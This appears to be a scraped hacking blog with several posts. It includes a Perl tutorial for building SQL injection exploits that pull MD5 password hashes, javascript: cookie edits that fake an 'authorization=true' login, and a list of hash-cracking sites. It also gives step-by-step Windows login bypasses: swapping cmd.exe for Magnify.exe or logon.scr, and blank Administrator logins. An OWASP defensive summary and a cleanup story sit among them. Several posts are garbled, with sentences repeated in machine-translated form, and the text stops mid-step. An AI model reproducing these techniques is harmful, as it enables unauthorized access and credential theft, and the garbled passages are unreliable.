Please, read out !Most people think that hackers are computer criminals. They fail to recognise the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organisations, companies, goverment, etc. to secure documents and secret information on the internet.
How To Catch A Hacker1 comments
Tip 1: Hackers cover their tracks. Experienced hackers cover them more thorougly, but amateur hackers sometimes leave things behind. Don’t expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you’re writing a term paper and a black hat hacker accidently saved it when he took a paragraph out- that’s suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file- you might find something.
Tip 2: Decipher between the type of hackers that are attacking you. Experienced hackers will have a more in depth look around when they penetrate your system. They won’t touch much because they know that that won’t add too much to their knowledge. But if you know a hacker’s been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, its probably some newbie who’s just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like “I’m in!” that they forget the basics, such as work behind a proxy. My friend was setting up a webserver once. His first time too, and he wasn’t to anxious to set up some good software to protect against hackers and viruses. He didn’t put up one IDS, and before you know it, the obvious happened. But this time, a newbie had struck. The nice log files showed, bluntly across the screen, multiple instances of a foreign IP address that stood out. Some stupid newbie had tried to login as “uucp” on my friend’s XP computer, with a password of “uucp.” Well, that’s great, but he also had tried the same user/pass combination three times, enough to get himself logged nicely. Even a semi-brainless user with some form of neurological system knows that uucp isn’t a default XP account. Again, excitement toiled this hacker’s brain, and maybe if he hadn’t done that, along with a few other stupid things, he wouldn’t have gotten caught. What other things did he do? Well, lets see. He openned 35 instances of MS-DOS. He tried to clean the printer’s heads, and he edited a .gif in notepad. Then he uninstalled a few programs and installed some html editor, and replaced four files with the words “14P.” He might as well have posted his phone number. In a few days, we had tracked him down to a suburban town in Ohio. We let him go, not pressing any charges, because he had done nothing really damaging and had provided me with an example of a moron for this guide. Tip 3: Don’t go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren’t blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren’t satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where’ve they been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address’s user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail addy it’s been unused for weeks if not months or years, and services like hotmail have already deleted it. Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like “14P”, e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they’re not floppy anymore, I wish I could get out of the habit of calling them that) incase there’s a next time. If you get another attack, from the same proxy, or with similar e-mail addresses (e.g: one says Blackjack 123@something.whatever and the other says Black_jack_45@something.znn.com) you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender. Tip 5: Don’t be stupid. If you’ve been hacked, take security to the next level. Hackers do talk about people they’ve hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I’ve never gone to one, but I’ve seen the photos. The “Wall of Shame”-type of boards I’ve seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don’t be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board! Tip 6: Don’t rely on luck. Chances are, sometime or another, you’re going to be targeted for an attack. Here you can rely on luck. Maybe they’ll forget? Maybe they don’t know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It’s probably just a whitehat. On the contrary, my friend, it’s probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It’s your data. You take the chance. Lost Windows Vista Password Hack1 comments
Requirements :
1 ) Windows Vista DVD 2 ) Computer with Windows Vista Please follow steps below to reset your Windows Vista Password in 10 minutes. Steps : 1. Insert the Windows Vista DVD into the DVD drive and then restart the computer. 2. Change Boot Options 1st Priority to Optical Drive. 3. When system booting up, if the message “Press any key to boot from cd” appears, immediately press Enter. 4. On Language Settings, Time and Currency and Keyboard Layout screen, just choose the correct settings then click Next. 5. On Install Now screen, click Repair. Note: Click No just in case you get the message: Windows found problems with your computer’s startup options. 6. On the System Recovery Options screen, under Operating System, click Windows Vista then click Next. Then select Command Prompt. 7. At the command prompt windows, type the following command then press Enter after typing each command: c: cd windows\system32 echo ~takeown /f %1 /r /d y > TakeControlOf.cmd echo ~icacls %1 /grant administrators:F /t ren Magnify.exe Magnify.old ren cmd.exe Magnify.exe 8. Restart the computer. 9. On the Welcome Screen, click the Ease button. 10. Check Make items on the screen larger then click OK. 11. At the prompt, type the command then press Enter. net user Administrator /active:yes exit 12. Restart the computer. 13. At the welcome screen, logon using the local administrator account. 14. Access Control Panel then click User Accounts. Select the username of the account you can’t login to then remove the password. 15. Log off on the current local administrator account your are logon to. 16. Check if you can logon to your user account now. 17. Open c:\windows\system32. 18. Right click on Magnify.exe, select Properties -> Security -> Advanced -> Owner -> Edit -> Administrators then click OK. 19. Select Edit -> Administrators -> Full Control then click Apply then OK. 20. Rename Magnify.old to Magnify.exe 21. Open command prompt then type the command then press Enter. net user Administrator /active:no i hope this will help you :) feedback will be appreciate. 10 Reasons Websites get hacked0 comments
1. Cross site scripting (XSS)
The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks. Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder. Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006. How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. “Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser,” OWASP says. 2. Injection flaws The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter — which interprets text-based commands — into executing unintended commands. “Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application,” OWASP writes. “In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.” Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113. How to protect users: Avoid using interpreters if possible. “If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries,” OWASP writes. 3. Malicious file execution The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development. Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission. How to protect users: Don’t use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems. 4. Insecure direct object reference The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys. Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface. “References to database keys are frequently exposed,” OWASP writes. “An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.” Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach. How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them 5. Cross site request forgery The problem: “Simple and devastating,” this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets. “Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery,” Williams says. “Has there been an actual exploit where someone’s lost money? Probably the banks don’t even know. To the bank, all it looks like is a legitimate transaction from a logged-in user.” Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences. How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. “The only solution is to use a custom token that the browser will not ‘remember,’” OWASP writes. 6. Information leakage and improper error handling The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings. “Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks,” OWASP says. Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data. How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. “Applications that have not been tested in this way will almost certainly generate unexpected error output,” OWASP writes. 7. Broken authentication and session management The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls. “Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update,” OWASP writes. Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers. How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form. Another tip: get rid of custom cookies used for authentication or session management. 8. Insecure cryptographic storage The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers. “These flaws can lead to disclosure of sensitive data and compliance violations,” OWASP writes. Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005. How to protect users: Don’t invent your own cryptographic algorithms. “Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing,” OWASP advises. Furthermore, generate keys offline, and never transmit private keys over insecure channels. 9. Insecure communications The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet. Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported. “The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA. How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems. 10. Failure to restrict URL access The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as “123456.” A hacker might say ‘I wonder what’s in 123457?’ Williams says. The attacks targeting this vulnerability are called forced browsing, “which encompasses guessing links and brute force techniques to find unprotected pages,” OWASP says. Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server. How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. “Make sure this is done … every step of the way, not just once towards the beginning of any multi-step process,’ OWASP advises. Writing SQL Injection exploits in Perl0 comments
—+— StArT
[1] Introduction Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an easiest life to everyone who decide to start writing a perl exploit. There are few requisites u need to proceed: - U must know the basics operation of perl (print, chomp, while, die, if, etc etc…); - U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…). Now, we are ready to start… [2] Little panning of Perl language used into an internet context Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the server side (or other..). To make this u need to use some “Perl modules”. Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but there are thousand and if u are curious just search on cpan to retrieve info on every module. [-] Using the IO::Socket module Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using a chomp, look at the example. Example: print “Insert the host to connect: “; chomp ($host= Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this host. To do this, we must create a new sock that will be used by the interpreter to connect. To create this we are going to write something like this: $sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″) or die ” ]+[ Connecting ... Can't connect to host.nn"; In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp ($host=www.fbi.gov). If connection is not possible an error message will appear ("Connecting ... Can't connect to host"). Resume: - Proto=>TCP -------> The protocol to use (TCP/UDP) - PeerAddr=> -------> The server/host to connect - PeerPort=> -------> Port to use for the connection Ok, now let's go to the next step, which is the real hearth of this tut. [3] Perl SQL Injection Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this. The SQL code must be treaty like a normal variable (like “$injection”). Example: $injection=index.php/forum?=[SQL_CODE] This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that will bring us to cause a SQL Injection “?=”. Now we must create a piece of code that will go to inject this query into the host vuln. print $sock “GET $injection HTTP/1.1n”; print $sock “Accept: */*n”; print $sock “User-Agent: Hackern”; print $sock “Host: $hostn”; print $sock “Connection: closenn”; This piece of code is the most important one into the building of an exploit. It can be considered the “validation” of the connection. In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host. In the first line the script will send a “GET” to the selected page defined into “$injection”. In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it can be “Mozilla/5.0 Firefox/1.0.4″ or other. In the fourth line it defines the host to connect to, “$host”. With the execution of this script we have made our injection. Resume of the exploit: use IO::Socket print “Insert the host to connect: “; chomp ($host= $sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″) or die ” ]+[ Connecting ... Can't connect to host.nn"; $injection=index.php/forum?=[SQL_CODE] print $sock “GET $injection HTTP/1.1n”; print $sock “Accept: */*n”; print $sock “User-Agent: Hackern”; print $sock “Host: $hostn”; print $sock “Connection: closenn”; close ($sock); #this line terminates the connection A little trick: Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it. Additionally, u want that your script will show the PWD on your screen. Well, to make this, the next piece of code, could be one of the possible solutions. while($answer = <$sock>) { if ($answer =~ /([0-9a-f]{32})/) { print “]+[ Found! The hash is: $1n”; exit(); } This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”), this word must be considered the MD5 Hash PWD and it must be showed on screen. Conclusions: The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one. U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code. This method can be used also, not only for SQL Injection, but, for example, remote file upload or other. pixelstats trackingpixel Javascript Injection1 comments
JavaScript is a widely used technology within websites and web based applications. JavaScript can be used for all sorts of useful things and functions. But along with this comes some additional security issues that need to be thought of and tested for. JavaScript can be used not only for good purposes, but also for malicious purposes.
Using JavaScript an individual can modify and change existing information within a form. It can be used not only to change form input tags, but also the cookie’s that are currently set in the browser, and any other value within a website or web application. Any type of parameter manipulation that you want to perform can typically be done with Javascript injection. To execute any javascript within a current session, a user would enter the specific javascript commands within the browser’s url bar minus the http://. All javascript commands must start with the javascript: tag followed by any javascript command that will be executed. All javascript is ended with a ; so a user could enter multiple javascript commands, as long as each command ended with the ; JavaScript cookie modification Using JavaScript a user can modify the current cookie settings. This can be performed with some basic JavaScript commands. To view the current contents of your current cookie/s, use the following JavaScript command. javascript:alert(document.cookie); This command will popup a box which lists your current cookies. A malicious user could use this to change values in the cookie. For example lets say a web application you are testing sets an authorization cookie to true when a user has successfully logged in and passed the authorization test. To change the values within the cookie, a malicious user would execute javascript like the following from the url bar within the browser. javascript:void(document.cookie="authorization=true"); This would cause the current cookie parameter authorization=false to be changed to authorization=true. Which the malicious user might not have passed the original authorization test. The malicious user has just bypassed the authorization test and gained access to the sensitive content. As you could imagine, this could cause severe problems in privilege escalation, if the malicious user could use JavaScript injection to bypass the correct authorization process. If you are testing for JavaScript injection and wish to see if the cookie has been altered you would execute a command simiar to the following, except you would want to replace the cookie name and value with the cookie you desire to test. Start with the javascript command to alter the cookie and then tack on the javascript alert function to view what the cookie was changed to. For example javascript:void(document.cookie="authorization=true");javascript:alert(document.cookie); JavaScript HTML Form modification You can also use javascript to modify any value with an html form, including hidden forms, and disabled forms. The following is an example of how you would set an input tag named email within form number 0 (or the first form on the page) javascript:void(document.forms[0].email.value="test@test.com"); How to protect against Javascript Injection Always validate the input received against a whitelist. If you use a blacklist you could and probably will come up against encoding issues. Always use a whitelist when validating input. Do not rely on client side validation to validate the user input. Client side validation is great for helping the user input correct data. But a malicious user will not use this and could bypass the client side validation. Client side validate is should never be considered as a security fix. Using javascript to validate input should not be used. As you can see javascript is very easy to change and modify on any html page. Additionally validate the input everytime, not just when the data is initally accepted. For example if you set a cookie, make sure that cookie is the same value and it is correct on each and every request. A malicious user could modify and change the value anytime during the session. Injecting javascript into existing pages Not only can you use javascript to manipulate parameters, cookies, but you can also inject javascript into dynamic pages to cause the page to render differently, do something else, or some other malicious thing. Think of a XSS attack. Come back soon and we will post some examples of this. Using JavaScript is difficult. Isn’t there an easier way? Actually there is an easier way to test for any type of parameter manipulation you can do with javascript injection. Using sometype of proxy that allows you to manipulate parameters on the fly is much easier. You can do this with a number of different applications. I’ve included a list of some of the proxy applications that allow you to do this. * Paros Proxy * TamperData There are many, many more security testing proxy tools, this is just a short list of a few of the quick, easy, and nice tools to use. Paros Proxy Paros is a valuable testing tool for your security and vulnerability testing. Paros can be used to spider/crawl your entire site, and then execute canned vulnerability scanner tests. But Paros goes beyond that, it comes with a built in utility that can proxy traffic. This Paros Proxy utility can be used to tamper or manipulate any http or https traffic on the fly. This makes some of the more interesting security types of testing. It will help you isolate potential area’s of security concern and then manual attempt to perform the type of testing you desire. Paros also comes with a built in Session ID analyzer. It will display a graph of all the types of Session ID’s it has been presented with using a multiple threaded session initiater. You then can determine if the graph appears random enough for the Session ID. It is a pretty unique and interesting tool to use. Although typically most developers will rely upon another technology tomcat, apache, or some other application to generate Session ID’s. This is not always the case and as such a Session ID analysis should be performed. Sometimes the Session ID will not be randomized enough and the hash used to create the Session ID is easily predictable. Paros also comes with a built in Fuzzer. You will need to generate your own Fuzzer library to use the Fuzzer, but it will perform all the fuzzing for you. http://www.parosproxy.org/index.shtml TamperData TamperData is an extension for Mozilla Firefox. You can use TamperData to halt the traffic http requests that are processing and to “Tamper”, change, modify any of the data that is being submitted to the website. TamperData is easily installed within your Firefox browser and is extremely easy to use. It only takes a moment to install and become familiar with the way it works. The one thing that I haven’t figured out to do with TamperData, is to modify HTTP GET parameters, I can see how to modify the HTTP headers, post parameters, but the GET parameters are a bit more misleading to me. All in all TamperData is an easy, excellent way to see what your web application is doing, and start testing with different and various other types of data. Parameter manipulation is very easy to do, there is no need to use Javascript Injection or re-posting webpages. This is a much easier way to just tamper with the data as it is being submitted to the web application. http://tamperdata.mozdev.org/ Crack MD5 Password Hash Online0 comments
http://gdataonline.com
http://md5.rednoize.com http://ice.breaker.free.fr http://www.milw0rm.com/md5/ http://shm.hard-core.pl/md5/ http://www.hashchecker.com http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/ http://md5.benramsey.com http://md5.altervista.org http://shm.hard-core.pl http://plain-text.info http://www.passcracking.ru/ http://www.securitystats.com/tools/hashcrack.php http://www.xmd5.org/index_en.htm PHP Script Injection Exploit in WordPress 2.7.11 comments
I experienced my first site hack this weekend thanks to a warning message from Kaspersky Internet Security. When I logged into the admin panel of WordPress, it detected the gumblar.cn/rss/?* in my Firefox browser. After a little Google research, I found out that this was a PHP script injection that had found its way into many of the PHP files of my site, including the index.php and index-extra.php of the wp-admin folder, functions.php in the wp-includes folder, index.php in the wp-content folder, custom-functions.php in the Thesis theme’s custom folder, and even the main wp-config.php file in the root. The code was in the beginning of these php files, and started out as follows:
gumlar-exploit Even after removing the code from the above pages, I still encountered the same warning message from Kaspersky, which meant the injection was in even more php files. I decided that checking each php file was going to take a lot of time, so I downloaded a fresh installation of WordPress 2.7.1 and the Thesis Theme. I only saved my original wp-config.php and custom-functions.php files after removing the injected PHP script because of the custom settings and code within them. After the fresh installation, I still had the malware code on my site. The final folder that I didn’t check was my plug-ins. Sure enough, after I deleted all of my plug-ins, my site was finally free of the malicious code. In summary, these were the steps I took to remove the code from my site, which took about two hours: * Saving the original wp-config.php and custom-functions.php from Thesis after the removal of the script in the top line of the PHP * Downloading and installing a fresh copy of Wordpress 2.7.1 and my current theme, Thesis 1.5 * Deleting all plug-ins and re-installing them from inside the WordPress admin panel * Changing my WordPress and FTP login passwords to (hopefully) protect my site from further attacks I can say with certainty that if I had not upgraded earlier in the week to the new WordPress 2.7.1 and Thesis Theme that this cleanup process would have been much more difficult, simply because I would have been forced to do the full upgrade in the middle of dealing with the hack would have been even more stressful. Plus with previous WordPress versions, I would not have been able to simply search and install the new plug-ins through the admin panel – it would have been the download, unzip, upload, and activate. And with any other theme, I would have certainly lost my custom coding in all of the theme template files without a recent backup. Fortunately with Thesis, all of the custom PHP coding is handled in the one custom-functions.php file. I believe that the code was only on my site for more than four hours, as I had worked on my site earlier around 7pm, and did not receive the first warning message from Kaspersky until 11:30pm. Nonetheless, this goes to show that you should always make sure your antivirus and spyware programs are up to date, and that any coding customizations to your site should be saved often. Any website, trusted ones and even your own, is susceptible to unwanted surprise attacks. Script Exploits Overview0 commentsFrom the perspective of a browser, a Web page is simply a long string of characters. The browser processes the string sequentially, displaying some characters while interpreting other characters, such as and according to special rules. If a malicious user can insert some of those special characters into a page, the browser will not know that the characters are not supposed to be there, and it will process them as part of the page. A simplistic script exploit might work as follows. If an application allows users to post comments about the latest movies for other users to read, the exploit steps might be:
There are other ways that malicious users can exploit script. Most script exploits require the application to accept the malicious input and inject it (or echo it) into a page where it will be executed by the browser. The potential damage from such an exploit depends on the script that is executed. It can be trivial, such as an annoying message that pops up in the browser. But it can also do serious damage by stealing cookies, stealing user input (such as a password), and, if Internet security is lax, running native code on the user's computer. Easy access to Windows XP with administrator account password Backdoor Trick1 comments
In password-protected Windows XP Home or Professional Edition system, each user connects to your own user name and password to gain full access to Windows computer. However, Windows user or administrator can still log in to the Windows XP machine without knowing the original password, if they have lost or forgotten the user ID or password, by using various bypass or crack method such as using However, the Windows user or administrator can access the Windows XP machine without knowing the original password, if you have lost or forgotten your user ID or password, by using various bypass or crack method such as using DreamPackPL to bypass the need to logon using valid account or password, crack or brute force retrieve the Windows passwords for various user or administrator account with to bypass the need for valid access code or password account, crack or recover passwords brute force Windows for multiple users or administrator account Ophcrack2, and using third party services such as, and the use of third party services, such as Login Recovery Log Recovery to retrieval and recovery of Windows user name and password. recovery and recovery of Windows user name and password. However, there is one simpler method to hack into a Windows XP system, if the computer owner installed Windows XP, and forgot or not set the Administrator account password. However, there is an easier way to cut on a Windows XP, if the computer owner installed Windows XP, and forgot or not set the password on the Administrator account.
By default installation, Windows XP has a built-in Administrator account Which equivalent to root or superuser privilege account in Linux or Unix that contains no password. By default installation, Windows XP includes an Administrator account is equivalent to root or superuser privilege account in Linux or Unix that contains no password. In other word, hacker or any people can simply key in Administrator as user name at the Windows Logon Welcome Screen prompt with blank password (no password) and get full administrative access as superuser to the Windows PC. In other words, hacker or any people can simply key in Administrator as user name in Windows Logon Welcome Screen fast blank (no password) and a full administrative access as superuser to the Windows PC. Worse, most computer owners do not even know such an Administrator account is actually exist, do not even mentioned they will create or set a password for Administrator user account. Worse, most homeowners do not even know such an Administrator account is actually existed, not even mentioned that create or establish a password for the Administrator user account. Windows XP Welcome Screen So this security flaw vulnerability provides an easy way to hack into any Windows XP computer that the user forgets or simply does not set a password for the Administrator user ID. Therefore, this security vulnerability failure provides an easy way to hack into any Windows XP computer that the user forgets or simply does not set a password for the Administrator user ID. The problem is that in normal Windows XP Welcome Screen where you choose Which user name you want to log onto, the Administrator user name is not displayed and is not shown. The problem is that in normal Windows XP Welcome Screen, where you choose which user name you want to connect to, the username is not displayed and not displayed. If you can not choose or select the Administrator from the login screen, then how are you going to log-in with the Administrator account? If you can not choose or select the Administrator login screen, then how will access the system with the administrator account? The following video clip provides a simple hack and trick. The following video clip provides a simple trick and gimmick. Basically, at Windows XP Welcome Screen, simply press Ctrl-Alt-Del keys sequence together twice, and you will be shown to Log On to Windows menu Which you can specify User Name and Password. Basically, in Windows XP WELCOM screen, simply press Ctrl-Alt-Del keys sequence together twice, and will see a sign in the Windows menu you can specify User Name and Password. In the User Name text box, key in "Administrator" (without quote) and leave the Password field blank. In the Username text box, key in "Administrator" (without the quotes) and leave the password field blank. Then press Enter or click on OK. Then press Enter or click OK. If there is not the Administrator account password protects, or blank password is set, then you will be able to access the Windows with full administrative privileges as Administrator. If no password protect the administrator account or a blank password is set, then you will be able to access Windows with full administrative privileges as Administrator. Hack and Reset Windows NT 4.0 and Windows 2000 domain administrator or the administrator password LOGON.SCR Trick1 comments
Forgot your administrator password? Forgot Administrator password? If you're using Windows NT 4.0 or some version of Windows 2000, you can reset the administrator user account password by using a simple trick and hack that Involves default screen saver, beside using third-party password recovery system or apps such as If using Windows NT 4.0 or some version of Windows 2000, you can reset the administrator password for the user account by using a simple trick that involves cutting and default screen saver, beside using third system or password recovery applications such as Login Recovery login recovery. With logon.scr password reset crack method, users can reset the admin user account password, without knowing or remembering existing password. With logon.scr password reset crack method, users can reset the admin user account password without knowing or remembering existing password. But the trick will not reveal and get back the existing password, nor it will work on newer Windows operating system such as Windows XP, Windows 2003 Server, or Windows Vista that has tighter security and privileges limitation. But the trick does not reveal and retrieve the current password, nor will work on new Windows operating system like Windows XP, Windows 2003 Server, or Windows Vista that have strengthened the security and restriction of privileges.
To change reset the local administrator's password on Windows NT and Windows 2000 (only on some versions, so you have to try your luck), or domain admin password on a Domain Controller (DC) running on Windows NT or Windows 2000, follow these steps : To change reset the local administrator password on Windows NT and Windows 2000 (only in some versions, so you have to try your luck), or the domain administrator password on a domain controller (DC) runs on Windows NT or Windows 2000, follow these steps: 1. Logon or login to the Windows computer with any user account. Windows Logon or login to your computer with any user account. 2. Navigate to% systemroot% \ System32 in Windows Explorer. Navigate to% systemroot% \ System32 in Windows Explorer. % systemroot% is your Windows installation folder, and normally located in \ WINNT or \ Windows (ie \ WINNT \ System32). % Systemroot% is your Windows installation folder, normally located in \ WINNT or \ Windows (ie \ WINNT \ System32). 3. Save a copy of LOGON.SCR file, or simply rename the file to something else logon.scr. Save a copy of LOGON.SCR file or simply rename the file to something else logon.scr. Just make sure that you remember where and what name is the backup copy. Just make sure you remember where and what name is the backup. 4. Delete the original LOGON.SCR from the% systemroot% \ System32 sub-folder after you have backed it up. Delete the original LOGON.SCR% systemroot% \ System32 sub-folder after having backed it up. The file should no longer exist if you rename it. The file should no longer exist if you rename. Note: If you having problem to delete or rename LOGON.SCR, it may be due to permission settings. Note: If you have problem to delete or rename LOGON.SCR may be due to permissions settings. Try to take ownership of the LOGON.SCR (by right clicking on LOGON.SCR, then select Properties and go to the Security tab, then click on the Ownership. Click "Take Ownership" and then click Yes to the prompt message.) and give the Everyone group Full Control permissions (by right clicking on LOGON.SCR then select Properties, then go to Security tabs. Click on Add and browse to and add the Everyone group. Give Everyone Full Control and then click on OK.) You May need to install an alternate second copy of Windows on the machine to do so as detailed at the end of this article. Try taking ownership of the LOGON.SCR (by right clicking on LOGON.SCR, then select Properties and go to the Security tab, then click the title. Click on "taking charge" and then click Yes to the prompt message.) and give the Everyone group Full Control permissions (by right clicking on LOGON.SCR then select Properties, then go to the Security tab. Click Add and browse and add the Everyone group. Give all Full Control and then click OK.) may have to install a second copy of Windows for the machine to do so, as detailed at the end of this article. 5. Copy and paste the CMD.EXE located in% systemroot% \ System32 to create additional copy of CMD.EXE in the same directory, then rename the new copied file as LOGON.SCR. Copy and paste the cmd.exe located in% systemroot% \ System32 to create additional copy of cmd.exe in the same directory, then rename the new file copied as LOGON.SCR. This will let the Windows NT or Windows 2000 to use CMD.EXE command prompt as the screen saver program that will be activated after computer idle for specific minutes. This will allow the Windows NT or Windows 2000 to use cmd.exe command program as the screen saver will be activated after specific computer idle for minutes. 6. Ensure that you activate the screen saver of the Windows. Make sure you activate the screen saver for Windows. 7. Wait for the computer screen saver wait time activation idle timeout, so that Windows will load the 